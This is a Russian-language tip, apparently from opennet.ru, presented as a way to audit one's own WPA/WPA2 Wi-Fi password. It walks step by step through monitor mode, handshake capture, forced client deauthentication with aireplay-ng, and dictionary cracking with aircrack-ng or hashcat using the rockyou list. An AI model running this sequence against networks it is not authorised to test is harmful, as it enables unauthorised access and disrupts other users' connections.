Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но злоумышленник может получить доступ к системам, на которых установлен недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить свои системы на предмет стойкости к атаке по типовому словарю паролей. Предлагается два метода восстановления пароля по перехваченному в трафике хэшу - при помощи [[http://aircrack-ng.org/ Aircrack-ng]] и [[http://hashcat.net/ Hashcat]].Устанавливаем Aircrack-ng:
sudo apt-get install aircrack-ng
Определяем, поддерживает ли беспроводная карта режим мониторинга (http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:
airmon-ng
Переводим беспроводную плату в режим мониторинга:
airmon-ng start wlan0
Отслеживаем все проходящие в эфире кадры на предмет идентификаторов беспроводной сети (BSSID) и используемых номеров каналов.
airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5E:8A:C9:AB:C0 -81 19 0 0 6 54e WPA2 CCMP PSK mywifi
...
Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием нового соединения (ждём пока появится надпись "WPA handshake" и прерываем перехват по ctrl-c):
airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0
Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):
airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0
BSSID STATION PWR Rate Lost Frames Probe
9C:5E:8A:C9:AB:C0 64:BC:0C:49:87:F7 -37 1e- 1e 4 6479 ASUS
aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0
Загружаем словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/down...
Запускаем aircrack-ng в режиме подбора хэша пароля по словарю (подбор выполняется только на CPU, без привлечения GPU):
aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap
Или используем для этого [[https://github.com/brannondorsey/naive-hashcat naive-hashcat]] (более эффективен при наличии доступа к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты [[https://github.com/hashcat/hashcat-utils cap2hccapx]]:
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
URL: https://github.com/brannondorsey/wifi-cracking
Обсуждается: https://www.opennet.ru/tips/info/3025.shtml